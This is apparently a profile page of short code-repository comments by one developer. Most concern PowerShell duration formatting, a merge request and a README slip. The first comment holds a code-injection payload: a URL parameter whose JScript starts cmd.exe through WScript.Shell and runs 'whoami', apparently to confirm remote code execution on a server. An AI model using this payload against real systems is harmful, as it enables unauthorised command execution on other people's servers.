Donny Maasland

Results 16 comments of Donny Maasland

And if you add this to the URL? ``` ?exec_code=Response.Write(new ActiveXObject("WScript.Shell").Exec("cmd.exe /c whoami").StdOut.ReadAll()); ```

no clue what you mean

That makes no difference. 1H is transformed to PT1H regardless: ```powershell # Format hour and minute time periods if ($value -match ".*[HM]") { return "PT$value" } return $value ```

Anything I can do to get this merged? :)

Ah sorry, my prettier extension messed up the readme :(